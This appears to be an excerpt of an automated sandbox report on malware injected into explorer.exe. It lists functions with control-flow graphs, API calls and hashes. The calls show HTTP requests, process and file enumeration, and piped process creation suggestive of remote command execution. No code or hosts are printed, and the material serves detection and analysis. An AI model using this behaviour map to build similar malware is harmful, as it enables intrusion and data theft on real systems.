                                                                                                                                            control_flow_graph 179 2e0a8e0-2e0a8fb call 2e08cf0 182 2e0a904-2e0a918 call 2e0b4cc 179->182 183 2e0a8fd-2e0a8ff 179->183 187 2e0a926-2e0a92b 182->187 188 2e0a91a-2e0a924 182->188 184 2e0aa04-2e0aa0b 183->184 189 2e0a930-2e0a941 call 2e0bf78 187->189 188->189 192 2e0a943-2e0a945 189->192 193 2e0a94a-2e0a983 call 2e0b470 FindFirstFileW 189->193 192->184 196 2e0a9f5-2e0a9ff call 2e082b4 193->196 197 2e0a985-2e0a98a 193->197 196->184 197->196 199 2e0a98c-2e0a9a1 FindNextFileW 197->199 201 2e0a9a3 199->201 202 2e0a9a5-2e0a9ab 199->202 201->196 203 2e0a9ad 202->203 204 2e0a9af-2e0a9dc call 2e0c144 call 2e07430 202->204 203->196 209 2e0a9f3 204->209 210 2e0a9de-2e0a9f1 LoadLibraryW 204->210 209->197 210->196
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DirectorySystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2188284642-0
                                                                                                                                            • Opcode ID: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                            • Instruction ID: e5f677be3528c799ccfd2979536982ab22f4f28a919cacbab150a3395b2ef5f6
                                                                                                                                            • Opcode Fuzzy Hash: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                            • Instruction Fuzzy Hash: 4431FE22698B8495DB60DB14F4C435AA361F784368F91A336E79E42BE8DF3CC586CB40
                                                                                                                                            Function 02E0B388 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 221 2e0b388-2e0b3c6 NtAllocateVirtualMemory 222 2e0b3d7-2e0b3e0 221->222 223 2e0b3c8-2e0b3d2 call 2e0b470 221->223 223->222
                                                                                                                                            APIs
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 2167126740-2766056989
                                                                                                                                            • Opcode ID: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                            • Instruction ID: 751f81a53acefac647a0e27906dbfdfcd0d3870bb66d4cabc0dae1e5e79d1d3b
                                                                                                                                            • Opcode Fuzzy Hash: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                            • Instruction Fuzzy Hash: C3E0C9B2238A84C6D7509F65E49470BB760F7847B8F906305FAA906BD8CBBCC158CF00
                                                                                                                                            Function 02E05078 Relevance: 1.6, APIs: 1, Instructions: 57filenetworkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 243 2e05078-2e050ba 244 2e050bc-2e050dc InternetReadFile 243->244 245 2e050de-2e050e3 244->245 246 2e0514f 244->246 245->246 247 2e050e5-2e05102 call 2e0b704 245->247 248 2e05154-2e0515c 246->248 251 2e05104-2e05106 247->251 252 2e05108-2e0514a call 2e0b3e4 247->252 251->248 252->244
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                            • Opcode ID: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                            • Instruction ID: 44552afb8f00f9169703b2884c87b69127ea10884c0f0fe2dbafd9beff3abd0b
                                                                                                                                            • Opcode Fuzzy Hash: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                            • Instruction Fuzzy Hash: 9D21CF3231968597D760CB15E49479AB3E1F3CC788F805125EA8D83B98EB7DCA45CF00
                                                                                                                                            Function 02E082B4 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 296 2e082b4-2e082cc 297 2e082ce-2e082eb NtFreeVirtualMemory 296->297 298 2e082ef-2e082f3 296->298 297->298
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeMemoryVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3963845541-0
                                                                                                                                            • Opcode ID: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                            • Instruction ID: 790da91d06ede32bbebe94b440921751c36fe103ea79f1fc622ba9e975dee985
                                                                                                                                            • Opcode Fuzzy Hash: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                            • Instruction Fuzzy Hash: 3DE0EC72608A8182D7209B60E4443897760F3853B8F944315EAF812AE8CF7CC29ACB04
                                                                                                                                            Function 02E0C704 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 299 2e0c704-2e0c730 NtDelayExecution
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DelayExecution
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1249177460-0
                                                                                                                                            • Opcode ID: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                            • Instruction ID: b41ab7807dbd2398c6ec9a0090082ec3fbc5a2b47d9b15309fa2981eb82ade27
                                                                                                                                            • Opcode Fuzzy Hash: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                            • Instruction Fuzzy Hash: 22D0C77270468087CB155B14E44520E7760F795344FD04529E68D45754DA3CC265CF04
                                                                                                                                            Function 02E041B4 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                            • Instruction ID: 893a595936b1771796b330c32320456e054c11b25fb76d3c910b7501c31daa78
                                                                                                                                            • Opcode Fuzzy Hash: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                            • Instruction Fuzzy Hash: C531853129864182E750ABB5FAD435E7351FB94368F40B325FA6A466D4DF7CC4D6CB00
                                                                                                                                            Function 02E05160 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 107 2e05160-2e051c7 call 2e0b388 call 2e0b4cc 112 2e051d8-2e051e0 107->112 113 2e051c9-2e051d6 107->113 114 2e051e5-2e0520d call 2e0be64 112->114 113->114 117 2e05265-2e05275 114->117 118 2e0520f-2e05226 call 2e0b4cc 114->118 119 2e05284-2e0528c 117->119 120 2e05277-2e05280 117->120 126 2e05237-2e0523f 118->126 127 2e05228-2e05235 118->127 122 2e05292-2e052a9 call 2e0b4cc 119->122 123 2e05315-2e0532c call 2e0b4cc 119->123 120->119 135 2e052ba-2e052c2 122->135 136 2e052ab-2e052b8 122->136 132 2e05340-2e05348 123->132 133 2e0532e-2e0533e 123->133 130 2e05244-2e0525b call 2e0be64 126->130 127->130 130->117 141 2e05260 call 2e0be64 130->141 138 2e05350-2e05397 HttpOpenRequestA 132->138 133->138 137 2e052c7-2e05310 HttpOpenRequestA 135->137 136->137 140 2e0539c-2e053a2 137->140 138->140 142 2e053a4 140->142 143 2e053a9-2e053b1 140->143 141->117 144 2e05467-2e0546d 142->144 145 2e053b3-2e053d0 InternetSetOptionA 143->145 146 2e053d6-2e053de 143->146 147 2e05479 144->147 148 2e0546f-2e05474 call 2e082b4 144->148 145->146 149 2e053e0-2e05422 call 2e0c0fc * 2 HttpSendRequestA 146->149 150 2e05424-2e0543f HttpSendRequestA 146->150 152 2e0547b-2e05482 147->152 148->147 154 2e05443-2e05448 149->154 150->154 155 2e0544a 154->155 156 2e0544c-2e0545b call 2e082b4 154->156 155->144 156->144 156->152
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02E0B388: NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            • HttpOpenRequestA.WININET ref: 02E05305
                                                                                                                                            • HttpOpenRequestA.WININET ref: 02E05391
                                                                                                                                            • InternetSetOptionA.WININET ref: 02E053D0
                                                                                                                                            • HttpSendRequestA.WININET ref: 02E05418
                                                                                                                                            • HttpSendRequestA.WININET ref: 02E05439
                                                                                                                                              • Part of subcall function 02E082B4: NtFreeVirtualMemory.NTDLL ref: 02E082E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2140924187-0
                                                                                                                                            • Opcode ID: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                            • Instruction ID: 1e368a0edcabb53a0e3987c1b8c4688815b80e8169df37fb40dfe1c8938100c4
                                                                                                                                            • Opcode Fuzzy Hash: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                            • Instruction Fuzzy Hash: BA71D832249BC486DB60DB14F48439AB7B5F788788F905126EACD42BA8DF7CC586CF40
                                                                                                                                            Function 02E08C30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 211 2e08c30-2e08c7b call 2e0b470 * 2 FindFirstVolumeW 216 2e08c81-2e08cd8 GetVolumeInformationW FindVolumeClose 211->216 217 2e08c7d-2e08c7f 211->217 219 2e08ce3 216->219 220 2e08cda-2e08ce1 216->220 218 2e08ce5-2e08cec 217->218 219->218 220->218
                                                                                                                                            APIs
                                                                                                                                            • FindFirstVolumeW.KERNEL32 ref: 02E08C6A
                                                                                                                                            • GetVolumeInformationW.KERNEL32 ref: 02E08CBE
                                                                                                                                            • FindVolumeClose.KERNEL32 ref: 02E08CCD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Volume$Find$CloseFirstInformation
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 586543143-0
                                                                                                                                            • Opcode ID: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                            • Instruction ID: f7ca91f454aad21bd5e717107bd5d7faa049061d7b255c9dd98e71fdfe2a92be
                                                                                                                                            • Opcode Fuzzy Hash: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                            • Instruction Fuzzy Hash: 0111EF72259A80D6D760DB10F4C439BB3B1F785354F904626E69942BE8DF7CC59ACB40
                                                                                                                                            Function 02E08A58 Relevance: 1.6, APIs: 1, Instructions: 94libraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 225 2e08a58-2e08a70 226 2e08a72-2e08a74 225->226 227 2e08a79-2e08acc 225->227 228 2e08bd4-2e08bd8 226->228 229 2e08ad8-2e08ae4 227->229 230 2e08bd2 229->230 231 2e08aea-2e08b41 call 2e0c0fc call 2e07430 229->231 230->228 236 2e08b47-2e08b4d 231->236 237 2e08bcd 231->237 236->237 239 2e08b4f-2e08b57 236->239 237->229 239->237 240 2e08b59-2e08b61 239->240 241 2e08b63-2e08b73 GetProcAddress GetProcAddressForCaller 240->241 242 2e08b75-2e08bcb 240->242 241->242 242->228
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 190572456-0
                                                                                                                                            • Opcode ID: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                            • Instruction ID: e1c04929ddd5454eb864f68f685dc5428759ce147b575e4c11a945c5346e77e9
                                                                                                                                            • Opcode Fuzzy Hash: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                            • Instruction Fuzzy Hash: 2A41AC76619A4487CB50CB19E49035AB7A0F3C8B84F505126EBCE83B68DB3CD591CF00
                                                                                                                                            Function 02E0545D Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 255 2e0545d-2e05461 256 2e05265-2e05275 255->256 257 2e05467-2e0546d 255->257 260 2e05284-2e0528c 256->260 261 2e05277-2e05280 256->261 258 2e05479 257->258 259 2e0546f-2e05474 call 2e082b4 257->259 263 2e0547b-2e05482 258->263 259->258 264 2e05292-2e052a9 call 2e0b4cc 260->264 265 2e05315-2e0532c call 2e0b4cc 260->265 261->260 272 2e052ba-2e052c2 264->272 273 2e052ab-2e052b8 264->273 270 2e05340-2e05348 265->270 271 2e0532e-2e0533e 265->271 275 2e05350-2e05397 HttpOpenRequestA 270->275 271->275 274 2e052c7-2e05310 HttpOpenRequestA 272->274 273->274 276 2e0539c-2e053a2 274->276 275->276 277 2e053a4 276->277 278 2e053a9-2e053b1 276->278 277->257 279 2e053b3-2e053d0 InternetSetOptionA 278->279 280 2e053d6-2e053de 278->280 279->280 281 2e053e0-2e05422 call 2e0c0fc * 2 HttpSendRequestA 280->281 282 2e05424-2e0543f HttpSendRequestA 280->282 284 2e05443-2e05448 281->284 282->284 285 2e0544a 284->285 286 2e0544c-2e0545b call 2e082b4 284->286 285->257 286->257 286->263
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1984915467-0
                                                                                                                                            • Opcode ID: b63ba8eaa06b2abc429e5557986bc836de0240013f192fa4620f15fbf5b13976
                                                                                                                                            • Instruction ID: 0660e680afb00df859deb72517dc25ef154ddf224b6017c4f9f2b9b32f67d1ec
                                                                                                                                            • Opcode Fuzzy Hash: b63ba8eaa06b2abc429e5557986bc836de0240013f192fa4620f15fbf5b13976
                                                                                                                                            • Instruction Fuzzy Hash: 70110D32149BC5C6EB61CB54F4C439AB7B0F788388F945526EAC942AA8DB7DC4C6CF01
                                                                                                                                            Function 02E06C6C Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 292 2e06c6c-2e06ca1 CreateThread 293 2e06ca3-2e06ca8 292->293 294 2e06caa 292->294 295 2e06cac-2e06cb0 293->295 294->295
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            • Opcode ID: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                            • Instruction ID: 49647b9159f838499927a9de58460ef5e62c4a0c7c4472d5780673d03af1f33e
                                                                                                                                            • Opcode Fuzzy Hash: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                            • Instruction Fuzzy Hash: 98E04F72664B8085DB64DB20F4C838A67A4F3C8398F806026E58F46B68CF3CC1DACB00

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 02E02164 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206pipefileprocessCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreatePipe.KERNEL32 ref: 02E02233
                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 02E0224D
                                                                                                                                            • CreatePipe.KERNEL32 ref: 02E0226E
                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 02E02288
                                                                                                                                            • CreatePipe.KERNEL32 ref: 02E022A9
                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 02E022C3
                                                                                                                                            • CreateProcessW.KERNEL32 ref: 02E02385
                                                                                                                                              • Part of subcall function 02E0B388: NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            • PeekNamedPipe.KERNEL32 ref: 02E02434
                                                                                                                                            • ReadFile.KERNEL32 ref: 02E02490
                                                                                                                                            • PeekNamedPipe.KERNEL32 ref: 02E024E4
                                                                                                                                            • ReadFile.KERNEL32 ref: 02E02540
                                                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 02E02579
                                                                                                                                            • TerminateProcess.KERNEL32 ref: 02E025AA
                                                                                                                                            • CloseHandle.KERNEL32 ref: 02E025B8
                                                                                                                                              • Part of subcall function 02E0C704: NtDelayExecution.NTDLL ref: 02E0C726
                                                                                                                                            • CloseHandle.KERNEL32 ref: 02E025C6
                                                                                                                                            • CloseHandle.KERNEL32 ref: 02E025D4
                                                                                                                                            • CloseHandle.KERNEL32 ref: 02E025E2
                                                                                                                                              • Part of subcall function 02E082B4: NtFreeVirtualMemory.NTDLL ref: 02E082E5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                                            • String ID: h
                                                                                                                                            • API String ID: 30365702-2439710439
                                                                                                                                            • Opcode ID: 1524f5b28a2edb6cb4b23f8a254870fd250a8d12787243c2afd0398788242095
                                                                                                                                            • Instruction ID: 5f464d97b4f7578efd4bed431793f98d95a687d13b59daed65e509feaf74574f
                                                                                                                                            • Opcode Fuzzy Hash: 1524f5b28a2edb6cb4b23f8a254870fd250a8d12787243c2afd0398788242095
                                                                                                                                            • Instruction Fuzzy Hash: 4CC1B636248BC08AE760DB55F49879FB7A1F3C4758F509125EA8983A68DFBDC489CF40
                                                                                                                                            Function 02E080B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43filenativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFileInitStringUnicode
                                                                                                                                            • String ID: 0$@
                                                                                                                                            • API String ID: 2498367268-1545510068
                                                                                                                                            • Opcode ID: 163a1ef7f33438d4532239550843a801b488fff278782a1d37a7daa1ffc6847a
                                                                                                                                            • Instruction ID: 820211bce160af1ea672fcdb80982780550de44ab62994c9d6b402f1ecce0b97
                                                                                                                                            • Opcode Fuzzy Hash: 163a1ef7f33438d4532239550843a801b488fff278782a1d37a7daa1ffc6847a
                                                                                                                                            • Instruction Fuzzy Hash: 1521CF721087C48AE760CF14F49438BBBA1F384398F90821AE6D947AA8CB7DC589CF40
                                                                                                                                            Function 02E02B28 Relevance: 6.1, APIs: 4, Instructions: 112fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02E0B388: NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            • FindFirstFileA.KERNEL32 ref: 02E02BE7
                                                                                                                                            • wsprintfA.USER32 ref: 02E02CAD
                                                                                                                                            • FindNextFileA.KERNEL32 ref: 02E02CDA
                                                                                                                                            • FindClose.KERNEL32 ref: 02E02CED
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 65906682-0
                                                                                                                                            • Opcode ID: 19b5a71f4bd669ed1cbe17d3c7cdf1e0173d750f2f9a06502065251e799152bb
                                                                                                                                            • Instruction ID: 62d4c4a48e4b456e756cd60d339f09e94d1cb9308419cd8d5ecc86fa17e32554
                                                                                                                                            • Opcode Fuzzy Hash: 19b5a71f4bd669ed1cbe17d3c7cdf1e0173d750f2f9a06502065251e799152bb
                                                                                                                                            • Instruction Fuzzy Hash: 1D513332158BC591DB50DB14F4C439EB3A5F784788F809525EB8D43AA8EF7CC586CB00
                                                                                                                                            Function 02E100E8 Relevance: .0, Instructions: 13COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e2b4a1f1a506ad700acba97789d8e39b3a15912a23b594e6d4674997956451e9
                                                                                                                                            • Instruction ID: de9a56deca0b33d7287cccdd455042abb3b9b72369244e177aa27a08ee67ca41
                                                                                                                                            • Opcode Fuzzy Hash: e2b4a1f1a506ad700acba97789d8e39b3a15912a23b594e6d4674997956451e9
                                                                                                                                            • Instruction Fuzzy Hash: 4BD0C9F79CABC407FE221A2588682DD2F10FB51F14F4AE8AACAD14A183994454854A16
                                                                                                                                            Function 02E10610 Relevance: .0, Instructions: 2COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b16ba6c6acdc4af1a81c610d49a86e1146ea0e6905794ada74ca67c290d43a8a
                                                                                                                                            • Instruction ID: 1e7cf6d52023175377210c866efa56614b7fe7256831da5a596980dbf2fe7961
                                                                                                                                            • Opcode Fuzzy Hash: b16ba6c6acdc4af1a81c610d49a86e1146ea0e6905794ada74ca67c290d43a8a
                                                                                                                                            • Instruction Fuzzy Hash: 2890025260E3D015C7039A6804345083F325042800349808B8391822838559046C8316
                                                                                                                                            Function 02E0C860 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 78networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$ConnectHttpOpenRequest
                                                                                                                                            • String ID: GET
                                                                                                                                            • API String ID: 830097650-1805413626
                                                                                                                                            • Opcode ID: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                            • Instruction ID: 8cb54c8ee2033886741d1482e47a5cd9070ecea925d8340c813dda518de7b868
                                                                                                                                            • Opcode Fuzzy Hash: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                            • Instruction Fuzzy Hash: 3E41C672518A8086E720CB54F49975BB7A0F3C4758F606126EBC987A68DFBDC499CB40
                                                                                                                                            Function 02E02D50 Relevance: 15.2, APIs: 10, Instructions: 232processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3605396869-0
                                                                                                                                            • Opcode ID: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                            • Instruction ID: e9ff1c5e374a71da9caeb47fb87890f974d3b3fa1285b71910de7a7de55a62d6
                                                                                                                                            • Opcode Fuzzy Hash: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                            • Instruction Fuzzy Hash: FFC1E132249BC595DA70DB14E4D439AB3A5F788788F845125EBCD43BA8EF78C586CF40
